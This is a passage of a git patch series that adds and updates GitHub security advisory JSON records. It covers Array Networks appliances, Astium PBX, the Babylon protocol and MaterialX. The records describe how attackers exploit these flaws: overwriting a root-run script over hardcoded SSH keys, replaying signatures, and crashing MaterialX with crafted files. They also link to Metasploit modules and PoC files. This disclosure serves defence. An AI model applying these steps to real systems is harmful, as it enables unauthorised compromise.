{ + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/astium_sqli_upload.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/23831" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/astium-voip-pbx-sqli-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wrg8-r7q6-v974/GHSA-wrg8-r7q6-v974.json b/advisories/unreviewed/2025/07/GHSA-wrg8-r7q6-v974/GHSA-wrg8-r7q6-v974.json index 702db27043596..b4bc057bd898f 100644 --- a/advisories/unreviewed/2025/07/GHSA-wrg8-r7q6-v974/GHSA-wrg8-r7q6-v974.json +++ b/advisories/unreviewed/2025/07/GHSA-wrg8-r7q6-v974/GHSA-wrg8-r7q6-v974.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-276" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-wwvj-rx6h-pgx7/GHSA-wwvj-rx6h-pgx7.json b/advisories/unreviewed/2025/07/GHSA-wwvj-rx6h-pgx7/GHSA-wwvj-rx6h-pgx7.json new file mode 100644 index 0000000000000..3bf9de7485e04 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wwvj-rx6h-pgx7/GHSA-wwvj-rx6h-pgx7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwvj-rx6h-pgx7", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125121" + ], + "details": "Array Networks vAPV (version 8.3.2.17) and vxAG (version 9.2.0.34) appliances are affected by a privilege escalation vulnerability caused by a combination of hardcoded SSH credentials (or SSH private key) and insecure permissions on a startup script. The devices ship with a default SSH login or a hardcoded DSA private key, allowing an attacker to authenticate remotely with limited privileges.\n\n\nOnce authenticated, an attacker can overwrite the world-writable /ca/bin/monitor.sh script with arbitrary commands. Since this script is executed with elevated privileges through the backend binary, enabling the debug monitor via backend -c \"debug monitor on\" triggers execution of the attacker's payload as root. This allows full system compromise.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125121" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/125761" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/32440" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/array-networks-vapv-vxag-default-credential-privilege-escalation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file From 5b25cfd49d0620c83c8bf3799351be33a60a458b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 16:45:22 +0000 Subject: [PATCH 279/323] Publish Advisories GHSA-7mm3-vfg8-7rg6 GHSA-8mx2-rjh8-q3jq --- .../2025/05/GHSA-7mm3-vfg8-7rg6/GHSA-7mm3-vfg8-7rg6.json | 4 ++-- .../2025/07/GHSA-8mx2-rjh8-q3jq/GHSA-8mx2-rjh8-q3jq.json | 8 ++++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2025/05/GHSA-7mm3-vfg8-7rg6/GHSA-7mm3-vfg8-7rg6.json b/advisories/github-reviewed/2025/05/GHSA-7mm3-vfg8-7rg6/GHSA-7mm3-vfg8-7rg6.json index 969725ad47911..c7fa00dfb0149 100644 --- a/advisories/github-reviewed/2025/05/GHSA-7mm3-vfg8-7rg6/GHSA-7mm3-vfg8-7rg6.json +++ b/advisories/github-reviewed/2025/05/GHSA-7mm3-vfg8-7rg6/GHSA-7mm3-vfg8-7rg6.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-7mm3-vfg8-7rg6", - "modified": "2025-05-22T14:56:00Z", + "modified": "2025-07-31T16:43:43Z", "published": "2025-05-15T14:05:32Z", "aliases": [], "summary": "Babylon Finality Provider `MsgCommitPubRandList` replay attack", - "details": "### Summary\n\nA high vulnerability exists in the Babylon protocol's x/finality module due to a lack of domain separation in signed messages, combined with insufficient validation in the MsgCommitPubRandList handler. Specifically, the handler does not enforce that the submitted Commitment field is 32 bytes long. This allows an attacker to replay a signature originally generated for a different message (e.g., a Proof-of-Possession in MsgCreateFinalityProvider) as a MsgCommitPubRandList. By crafting the message parameters, an attacker can use the typically 20-byte address bytes (from the PoP context) to form the StartHeight, NumPubRand, and a shorter-than-expected Commitment (e.g., 4 bytes). The replayed signature will pass verification for this crafted message, leading to the injection of an invalid PubRand commitment.\n\n### Impact\n\nSuccessful exploitation of this vulnerability, specifically via the PoP signature replay, allows an attacker to store an invalid PubRand commitment (with a non-standard length, e.g., 4 bytes) for a targeted Finality Provider (FP). Despite the commitment itself being malformed, it's the associated StartHeight and NumPubRand (derived from the replayed address bytes and typically very large) that cause severe consequences\n\n### Future recommendations\n\nTo minimize future risk of such attacks, all finality providers should:\n1. Never re-use your finality provider EOTS across the networks (e.g., the testnet) or for any other purpose. \n2. Never use EOTS keys to sign any other data than relevant to in-protocol messages. Ideally EOTS key should only be used to:\n - Sign initial proof of possession message\n - Sign periodic randomness commits\n - Sign finality votes with every block\n\n### Finder\nVulnerability discovered by:\n- Marco Nunes\n- https://x.com/marcotnunes", + "details": "### Summary\n\nA high vulnerability exists in the Babylon protocol's x/finality module due to a lack of domain separation in signed messages, combined with insufficient validation in the MsgCommitPubRandList handler. Specifically, the handler does not enforce that the submitted Commitment field is 32 bytes long. This allows an attacker to replay a signature originally generated for a different message (e.g., a Proof-of-Possession in MsgCreateFinalityProvider) as a MsgCommitPubRandList. By crafting the message parameters, an attacker can use the typically 20-byte address bytes (from the PoP context) to form the StartHeight, NumPubRand, and a shorter-than-expected Commitment (e.g., 4 bytes). The replayed signature will pass verification for this crafted message, leading to the injection of an invalid PubRand commitment.\n\n### Impact\n\nSuccessful exploitation of this vulnerability, specifically via the PoP signature replay, allows an attacker to store an invalid PubRand commitment (with a non-standard length, e.g., 4 bytes) for a targeted Finality Provider (FP). Despite the commitment itself being malformed, it's the associated StartHeight and NumPubRand (derived from the replayed address bytes and typically very large) that cause severe consequences\n\n### Future recommendations\n\nTo minimize future risk of such attacks, all finality providers should:\n1. Never re-use your finality provider EOTS across the networks (e.g., the testnet) or for any other purpose. \n2. Never use EOTS keys to sign any other data than relevant to in-protocol messages. Ideally EOTS key should only be used to:\n - Sign initial proof of possession message\n - Sign periodic randomness commits\n - Sign finality votes with every block\n\n### Finder\nVulnerability discovered by:\n- Marco Hextor\n- https://x.com/marcohextor\n- @marcohextor", "severity": [ { "type": "CVSS_V4", diff --git a/advisories/github-reviewed/2025/07/GHSA-8mx2-rjh8-q3jq/GHSA-8mx2-rjh8-q3jq.json b/advisories/github-reviewed/2025/07/GHSA-8mx2-rjh8-q3jq/GHSA-8mx2-rjh8-q3jq.json index b082ba883a7eb..88aad68f85a3d 100644 --- a/advisories/github-reviewed/2025/07/GHSA-8mx2-rjh8-q3jq/GHSA-8mx2-rjh8-q3jq.json +++ b/advisories/github-reviewed/2025/07/GHSA-8mx2-rjh8-q3jq/GHSA-8mx2-rjh8-q3jq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8mx2-rjh8-q3jq", - "modified": "2025-07-31T13:48:36Z", + "modified": "2025-07-31T16:44:30Z", "published": "2025-07-31T13:48:36Z", "aliases": [ "CVE-2025-54589" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/9001/copyparty/security/advisories/GHSA-8mx2-rjh8-q3jq" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54589" + }, { "type": "WEB", "url": "https://github.com/9001/copyparty/commit/a8705e611d05eeb22be5d3d7d9ab5c020fe54c62" @@ -63,6 +67,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2025-07-31T13:48:36Z", - "nvd_published_at": null + "nvd_published_at": "2025-07-31T14:15:34Z" } } \ No newline at end of file From abb24d89588a411847aef923471d32d5fb1d676b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 31 Jul 2025 18:32:57 +0000 Subject: [PATCH 280/323] Advisory Database Sync --- .../GHSA-q5q7-8x6x-hcg2.json | 6 +- .../GHSA-jq8x-v7jw-v675.json | 6 +- .../GHSA-3jhf-gxhr-q4cx.json | 68 +++++++++++++++++++ .../GHSA-7qw8-3vmf-gj32.json | 68 +++++++++++++++++++ .../GHSA-3qj9-m33f-45xw.json | 6 +- .../GHSA-4p2r-xxqf-p9x8.json | 6 +- .../GHSA-6g39-9vj5-c7xv.json | 6 +- .../GHSA-7vrx-w4v5-hwph.json | 6 +- .../GHSA-cw5p-gwrw-rv56.json | 6 +- .../GHSA-f29v-pr27-8f5j.json | 6 +- .../GHSA-p8jh-6v2f-m29j.json | 6 +- .../GHSA-vmp6-vfp8-8398.json | 6 +- .../GHSA-rg5m-fc62-h68h.json | 18 ++++- .../GHSA-h488-5g2w-vhxr.json | 9 ++- .../GHSA-wmvg-c6fc-33c8.json | 6 +- .../GHSA-wrfh-r93c-gw3f.json | 6 +- .../GHSA-27vh-g29g-4cf7.json | 15 ++-- .../GHSA-28h9-ww78-cwxg.json | 15 ++-- .../GHSA-2c58-jp5q-q38f.json | 15 ++-- .../GHSA-2x2p-cpx8-p838.json | 15 ++-- .../GHSA-32gv-r223-hpr7.json | 33 +++++++++ .../GHSA-3prx-m3mm-fp9r.json | 15 ++-- .../GHSA-3w65-g885-345g.json | 40 +++++++++++ .../GHSA-3x8x-wfc9-4c2q.json | 15 ++-- .../GHSA-49w2-42m2-3c53.json | 15 ++-- .../GHSA-4c8j-3p6w-vq76.json | 3 +- .../GHSA-574p-2r3p-7673.json | 15 ++-- .../GHSA-642p-23g6-ph4w.json | 15 ++-- .../GHSA-6c8f-35g7-q3cm.json | 40 +++++++++++ .../GHSA-6c9h-8vxc-74xh.json | 40 +++++++++++ .../GHSA-6fpv-q3vm-j4gh.json | 33 +++++++++ .../GHSA-75pq-m89c-9h5r.json | 29 ++++++++ .../GHSA-782f-gxj5-xvqc.json | 37 ++++++++++ .../GHSA-8c4w-j52q-j4jq.json | 10 ++- .../GHSA-8wmv-6886-5g9j.json | 3 +- .../GHSA-95cp-j893-h7c8.json | 15 ++-- .../GHSA-96fp-5vvq-h9wg.json | 15 ++-- .../GHSA-986c-mq88-7jvv.json | 15 ++-- .../GHSA-989f-fh5x-8jw4.json | 48 +++++++++++++ .../GHSA-9q5r-wg62-43mc.json | 3 +- .../GHSA-c2ff-5p35-6q77.json | 33 +++++++++ .../GHSA-c5c8-8x9j-g6r4.json | 3 +- .../GHSA-chc2-j7q5-g527.json | 3 +- .../GHSA-cqqr-8x23-33xc.json | 15 ++-- .../GHSA-f6ch-wgf2-cc32.json | 15 ++-- .../GHSA-g6xf-cqq5-rjpx.json | 3 +- .../GHSA-g74q-gh4w-3jmf.json | 33 +++++++++ .../GHSA-g82j-g4vg-cqg3.json | 15 ++-- .../GHSA-gcvq-jr65-5cwf.json | 3 +- .../GHSA-gfcc-vchc-gg23.json | 15 ++-- .../GHSA-gg5m-q45x-623f.json | 15 ++-- .../GHSA-gm3w-v4rg-3m94.json | 4 +- .../GHSA-gp8p-9xfx-q8f8.json | 3 +- .../GHSA-h29h-mrjx-j3rq.json | 15 ++-- .../GHSA-hc9q-xqxq-qjr5.json | 15 ++-- .../GHSA-hq48-r775-f9j2.json | 29 ++++++++ .../GHSA-j927-gjfr-7859.json | 33 +++++++++ .../GHSA-jgfh-9r2w-fcrh.json | 36 ++++++++++ .../GHSA-jgfv-5w6w-r347.json | 15 ++-- .../GHSA-mh5r-54wv-3957.json | 15 ++-- .../GHSA-p92p-vw5f-568g.json | 15 ++-- .../GHSA-p9p4-h5gm-3hf5.json | 48 +++++++++++++ .../GHSA-pc8j-gfwh-489w.json | 15 ++-- .../GHSA-pcpc-22gx-2w2v.json | 15 ++-- .../GHSA-pgmc-x6p4-6hf7.json | 15 ++-- .../GHSA-pj5p-695q-ppg6.json | 3 +- .../GHSA-pp44-53wg-rwwx.json | 15 ++-- .../GHSA-pqr9-jhfg-m7q3.json | 15 ++-- .../GHSA-q4xj-79jm-5gwm.json | 33 +++++++++ .../GHSA-q545-9wcw-vwf9.json | 15 ++-- .../GHSA-qh68-q24j-hfmf.json | 15 ++-- .../GHSA-v3q5-xfqm-wpf2.json | 15 ++-- .../GHSA-v9hg-gx5f-3cpp.json | 15 ++-- .../GHSA-vch4-7x67-5j92.json | 15 ++-- .../GHSA-vfcq-438j-fxwg.json | 56 +++++++++++++++ .../GHSA-vq3r-vchr-9x6p.json | 15 ++-- .../GHSA-vrfh-8v52-6452.json | 15 ++-- .../GHSA-w369-vj2v-c2xc.json | 15 ++-- .../GHSA-w5m4-3739-7jcj.json | 48 +++++++++++++ .../GHSA-w694-7r6q-q7vv.json | 6 +- .../GHSA-wm47-xw3j-cmfh.json | 15 ++-- .../GHSA-wqcc-7crj-3p76.json | 33 +++++++++ .../GHSA-wr2x-xq5x-p5vf.json | 33 +++++++++ .../GHSA-wvw8-3gm3-qgrg.json | 15 ++-- .../GHSA-xmf4-pwcw-hwqf.json | 15 ++-- 85 files changed, 1388 insertions(+), 179 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json create mode 100644 advisories/unreviewed/2025/07/GHSA-32gv-r223-hpr7/GHSA-32gv-r223-hpr7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3w65-g885-345g/GHSA-3w65-g885-345g.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6c8f-35g7-q3cm/GHSA-6c8f-35g7-q3cm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6c9h-8vxc-74xh/GHSA-6c9h-8vxc-74xh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-989f-fh5x-8jw4/GHSA-989f-fh5x-8jw4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hq48-r775-f9j2/GHSA-hq48-r775-f9j2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j927-gjfr-7859/GHSA-j927-gjfr-7859.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jgfh-9r2w-fcrh/GHSA-jgfh-9r2w-fcrh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p9p4-h5gm-3hf5/GHSA-p9p4-h5gm-3hf5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q4xj-79jm-5gwm/GHSA-q4xj-79jm-5gwm.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vfcq-438j-fxwg/GHSA-vfcq-438j-fxwg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w5m4-3739-7jcj/GHSA-w5m4-3739-7jcj.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wqcc-7crj-3p76/GHSA-wqcc-7crj-3p76.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wr2x-xq5x-p5vf/GHSA-wr2x-xq5x-p5vf.json diff --git a/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json b/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json index 95b707844bc76..d4a42c95bfa72 100644 --- a/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json +++ b/advisories/github-reviewed/2025/05/GHSA-q5q7-8x6x-hcg2/GHSA-q5q7-8x6x-hcg2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q5q7-8x6x-hcg2", - "modified": "2025-07-28T13:01:28Z", + "modified": "2025-07-31T18:31:56Z", "published": "2025-05-26T12:30:30Z", "aliases": [ "CVE-2025-4057" @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/arkmq-org/activemq-artemis-operator/commit/d3482fab6d0060794226c9e5a6fa67d209abc35a" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12355" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8147" diff --git a/advisories/github-reviewed/2025/06/GHSA-jq8x-v7jw-v675/GHSA-jq8x-v7jw-v675.json b/advisories/github-reviewed/2025/06/GHSA-jq8x-v7jw-v675/GHSA-jq8x-v7jw-v675.json index 28e9d1bc5ca0f..4242f1b08867e 100644 --- a/advisories/github-reviewed/2025/06/GHSA-jq8x-v7jw-v675/GHSA-jq8x-v7jw-v675.json +++ b/advisories/github-reviewed/2025/06/GHSA-jq8x-v7jw-v675/GHSA-jq8x-v7jw-v675.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jq8x-v7jw-v675", - "modified": "2025-06-06T23:16:21Z", + "modified": "2025-07-31T18:31:57Z", "published": "2025-06-06T15:30:53Z", "withdrawn": "2025-06-06T23:16:21Z", "aliases": [], @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/ogham/rust-users/issues/44" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12359" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-5791" diff --git a/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json b/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json new file mode 100644 index 0000000000000..f5b6071a53f44 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-3jhf-gxhr-q4cx/GHSA-3jhf-gxhr-q4cx.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jhf-gxhr-q4cx", + "modified": "2025-07-31T18:31:11Z", + "published": "2025-07-31T18:31:11Z", + "aliases": [ + "CVE-2025-53010" + ], + "summary": "MaterialX Null Pointer Dereference in getShaderNodes due to Unchecked nodeGraph->getOutput return", + "details": "### Summary\n\nWhen parsing shader nodes in a MTLX file, the MaterialXCore code accesses a potentially null pointer, which can lead to crashes with maliciously crafted files.\n\n### Details\n\nIn `src/MaterialXCore/Material.cpp`, in function `getShaderNodes`, the following code fetches the output nodes for a given `nodegraph` input node:\n\n```cpp\n// SNIP...\n else if (input->hasNodeGraphString())\n {\n // Check upstream nodegraph connected to the input.\n // If no explicit output name given then scan all outputs on the nodegraph.\n ElementPtr parent = materialNode->getParent();\n NodeGraphPtr nodeGraph = parent->getChildOfType(input->getNodeGraphString());\n if (!nodeGraph)\n {\n continue;\n }\n vector outputs;\n if (input->hasOutputString())\n {\n outputs.push_back(nodeGraph->getOutput(input->getOutputString())); // <--- null ptr is returned\n }\n else\n {\n outputs = nodeGraph->getOutputs();\n }\n for (OutputPtr output : outputs)\n {\n NodePtr upstreamNode = output->getConnectedNode(); // <--- CRASHES HERE\n if (upstreamNode && !shaderNodeSet.count(upstreamNode))\n {\n if (!target.empty() && !upstreamNode->getNodeDef(target))\n {\n continue;\n }\n shaderNodeVec.push_back(upstreamNode);\n shaderNodeSet.insert(upstreamNode);\n }\n }\n }\n }\n// SNIP...\n```\n\nThe issues arise because the `nodeGraph->getOutput(input->getOutputString())` call can return a null pointer, therefore when trying to call `output->getConnectedNode()`, this results in a crash .\n\n\n### PoC\n\nPlease download `nullptr_getshadernodes.mltx` from the following link:\n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-53010\n\n`build/bin/MaterialXView --material nullptr_getshadernodes.mtlx`\n\n\n### Impact\n\nAn attacker could intentionally crash a target program that uses OpenEXR by sending a malicious MTLX file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MaterialX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.39.2" + }, + { + "fixed": "1.39.3" + } + ] + } + ], + "versions": [ + "1.39.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-3jhf-gxhr-q4cx" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/commit/e13344ba13326869d7820b444705f24d56fab73d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-53010" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T18:31:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json b/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json new file mode 100644 index 0000000000000..153ba5c2e88c9 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-7qw8-3vmf-gj32/GHSA-7qw8-3vmf-gj32.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qw8-3vmf-gj32", + "modified": "2025-07-31T18:31:24Z", + "published": "2025-07-31T18:31:23Z", + "aliases": [ + "CVE-2025-53011" + ], + "summary": "MaterialX Null Pointer Dereference in MaterialXCore Shader Generation due to Unchecked implGraphOutput", + "details": "### Summary\n\nWhen parsing shader nodes in a MTLX file, the MaterialXCore code accesses a potentially null pointer, which can lead to crashes with maliciously crafted files.\n\n### Details\n\nIn `source/MaterialXCore/Material.cpp`, the following code extracts the output nodes for a given implementation graph:\n\n```cpp\n InterfaceElementPtr impl = materialNodeDef->getImplementation();\n if (impl && impl->isA())\n {\n NodeGraphPtr implGraph = impl->asA();\n for (OutputPtr defOutput : materialNodeDef->getOutputs())\n {\n if (defOutput->getType() == MATERIAL_TYPE_STRING)\n {\n OutputPtr implGraphOutput = implGraph->getOutput(defOutput->getName());\n for (GraphIterator it = implGraphOutput->traverseGraph().begin(); it != GraphIterator::end(); ++it)\n {\n ElementPtr upstreamElem = it.getUpstreamElement();\n if (!upstreamElem)\n {\n it.setPruneSubgraph(true);\n continue;\n }\n NodePtr upstreamNode = upstreamElem->asA();\n if (upstreamNode && upstream\n```\n\nHowever, when defining the `implGraphOutput` variable by getting the output node, the code doesn't check whether its value is null before accessing its iterator `traverseGraph()`. This leads to a potential null pointer dereference.\n\n### PoC\n\nPlease download `nullptr_implgraph.mtlx` from the following link:\n\nhttps://github.com/ShielderSec/poc/tree/main/CVE-2025-53011\n\n`build/bin/MaterialXView --material nullptr_implgraph.mtlx`\n\n### Impact\n\nAn attacker could intentionally crash a target program that uses MaterialX by sending a malicious MTLX file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MaterialX" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.39.2" + }, + { + "fixed": "1.39.3" + } + ] + } + ], + "versions": [ + "1.39.2" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/security/advisories/GHSA-7qw8-3vmf-gj32" + }, + { + "type": "WEB", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX/commit/7ac1c71de5187dc29793292b5a8dc6d784192ecf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/AcademySoftwareFoundation/MaterialX" + }, + { + "type": "WEB", + "url": "https://github.com/ShielderSec/poc/tree/main/CVE-2025-53011" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2025-07-31T18:31:23Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-3qj9-m33f-45xw/GHSA-3qj9-m33f-45xw.json b/advisories/unreviewed/2022/05/GHSA-3qj9-m33f-45xw/GHSA-3qj9-m33f-45xw.json index eb4b331a12361..f31933f1081fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-3qj9-m33f-45xw/GHSA-3qj9-m33f-45xw.json +++ b/advisories/unreviewed/2022/05/GHSA-3qj9-m33f-45xw/GHSA-3qj9-m33f-45xw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3qj9-m33f-45xw", - "modified": "2022-05-13T01:36:30Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:36:30Z", "aliases": [ "CVE-2017-6738" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6738" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-4p2r-xxqf-p9x8/GHSA-4p2r-xxqf-p9x8.json b/advisories/unreviewed/2022/05/GHSA-4p2r-xxqf-p9x8/GHSA-4p2r-xxqf-p9x8.json index f5a0d86cfad80..c035b2612f4b3 100644 --- a/advisories/unreviewed/2022/05/GHSA-4p2r-xxqf-p9x8/GHSA-4p2r-xxqf-p9x8.json +++ b/advisories/unreviewed/2022/05/GHSA-4p2r-xxqf-p9x8/GHSA-4p2r-xxqf-p9x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4p2r-xxqf-p9x8", - "modified": "2022-05-13T01:36:27Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:36:27Z", "aliases": [ "CVE-2017-6741" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6741" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-6g39-9vj5-c7xv/GHSA-6g39-9vj5-c7xv.json b/advisories/unreviewed/2022/05/GHSA-6g39-9vj5-c7xv/GHSA-6g39-9vj5-c7xv.json index 2d942831ee47d..0044c4b7daee9 100644 --- a/advisories/unreviewed/2022/05/GHSA-6g39-9vj5-c7xv/GHSA-6g39-9vj5-c7xv.json +++ b/advisories/unreviewed/2022/05/GHSA-6g39-9vj5-c7xv/GHSA-6g39-9vj5-c7xv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6g39-9vj5-c7xv", - "modified": "2022-05-13T01:24:42Z", + "modified": "2025-07-31T18:31:48Z", "published": "2022-05-13T01:24:42Z", "aliases": [ "CVE-2017-6743" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6743" }, + { + "type": "WEB", + "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" + }, { "type": "WEB", "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170629-snmp" diff --git a/advisories/unreviewed/2022/05/GHSA-7vrx-w4v5-hwph/GHSA-7vrx-w4v5-hwph.json b/advisories/unreviewed/2022/05/GHSA-7vrx-w4v5-hwph/GHSA-7vrx-w4v5-hwph.json index 578db731f6703..c33d933e74bf5 100644 --- 